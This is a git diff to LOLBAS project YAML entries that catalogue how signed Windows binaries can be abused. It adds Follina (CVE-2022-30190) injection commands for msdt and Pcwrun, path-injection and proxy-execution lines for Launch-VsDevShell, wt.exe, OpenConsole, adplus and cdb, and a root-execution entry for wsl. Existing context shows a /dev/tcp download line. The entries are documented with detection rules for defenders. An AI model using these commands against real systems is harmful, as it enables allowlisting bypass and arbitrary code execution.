diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 19e2e47..81b4799 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -18,18 +18,27 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" + Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. + Usecase: Execute code bypass Application allowlisting + Category: AWL Bypass + Privileges: User + MitreID: T1202 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_msdt.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://twitter.com/harr0ey/status/991338229952598016 + - Link: https://twitter.com/nas_bench/status/1531944240271568896 Acknowledgement: - - Person: - Handle: + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index 26c7a31..de15d07 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -11,14 +11,22 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: Pcwrun.exe /../../$(calc).exe + Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcwrun.exe -Code_Sample: - - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_indirect_cmd_compatibility_assistant.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml Resources: - Link: https://twitter.com/pabraeken/status/991335019833708544 + - Link: https://twitter.com/nas_bench/status/1535663791362519040 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml new file mode 100644 index 0000000..ba4f939 --- /dev/null +++ b/yml/OSBinaries/wt.yml @@ -0,0 +1,22 @@ +--- +Name: wt.exe +Description: Windows Terminal +Author: Nasreddine Bencherchali +Created: 2022-07-27 +Commands: + - Command: wt.exe calc.exe + Description: Execute calc.exe via Windows Terminal. + Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 11 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/add077b8f54474cbfa859cf45a1ca62be5462b0f/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +Resources: + - Link: https://twitter.com/nas_bench/status/1552100271668469761 +Acknowledgement: + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml new file mode 100644 index 0000000..d5bb9b2 --- /dev/null +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -0,0 +1,30 @@ +--- +Name: Launch-VsDevShell.ps1 +Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet +Author: 'Nasreddine Bencherchali' +Created: 2022-06-13 +Commands: + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath "C:\windows\system32\calc.exe"' + Description: Execute binaries from the context of the signed script using the "VsWherePath" flag. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10, Windows 11 + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' + Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 + - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +Resources: + - Link: https://twitter.com/nas_bench/status/1535981653239255040 +Acknowledgement: + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 0cd6d62..fc3a135 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -11,15 +11,41 @@ Commands: Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows + - Command: adplus.exe -c config-adplus.xml + Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file). + Usecase: Run commands under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: All Windows + - Command: adplus.exe -c config-adplus.xml + Description: Dump process memory using adplus config file (see Resources section for a sample file). + Usecase: Run commands under a trusted Microsoft signed binary + Category: Dump + Privileges: SYSTEM + MitreID: T1003.001 + OperatingSystem: All Windows + - Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe + Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. + Usecase: Run commands under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: All windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe Code_Sample: - - Code: + - Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ + - Link: https://twitter.com/nas_bench/status/1534916659676422152 + - Link: https://twitter.com/nas_bench/status/1534915321856917506 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index db3adea..8bfc5fd 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -14,17 +14,24 @@ Commands: - Command: | cdb.exe -pd -pn .shell - Description: Attaching to any process and executing shell commands + Description: Attaching to any process and executing shell commands. Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows + - Command: cdb.exe -c C:\debug-script.txt calc + Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). + Usecase: Run commands under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe Code_Sample: - - Code: + - Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_cdb.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -35,6 +42,7 @@ Resources: - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ + - Link: https://twitter.com/nas_bench/status/1534957360032120833 Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' @@ -42,3 +50,5 @@ Acknowledgement: Handle: '@mrd0x' - Person: Spooky Sec Handle: '@sec_spooky' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml new file mode 100644 index 0000000..81d00e3 --- /dev/null +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -0,0 +1,25 @@ +--- +Name: OpenConsole.exe +Description: Console Window host for Windows Terminal +Author: Nasreddine Bencherchali +Created: 2022-06-17 +Commands: + - Command: "OpenConsole.exe calc" + Description: Execute calc with OpenConsole.exe as parent process + Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe + - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe +Detection: + - IOC: OpenConsole.exe spawning unexpected processes + - Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml +Resources: + - Link: https://twitter.com/nas_bench/status/1537563834478645252 +Acknowledgement: + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index ab97c09..796ad4b 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -25,6 +25,13 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 19 Server + - Command: wsl.exe --system calc.exe + Description: Execute the command as root + Usecase: Performs execution of arbitrary Linux commands as root without need for password. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file @@ -37,11 +44,12 @@ Full_Path: Code_Sample: - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/2a4e6d8ebeb07d294e6d16a083361bd7e53df7b3/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Child process from wsl.exe Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Link: https://twitter.com/nas_bench/status/1535431474429808642 Acknowledgement: - Person: Alex Ionescu Handle: '@aionescu' @@ -49,3 +57,5 @@ Acknowledgement: Handle: '@NotoriousRebel1' - Person: Asif Matadar Handle: '@d1r4c' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench'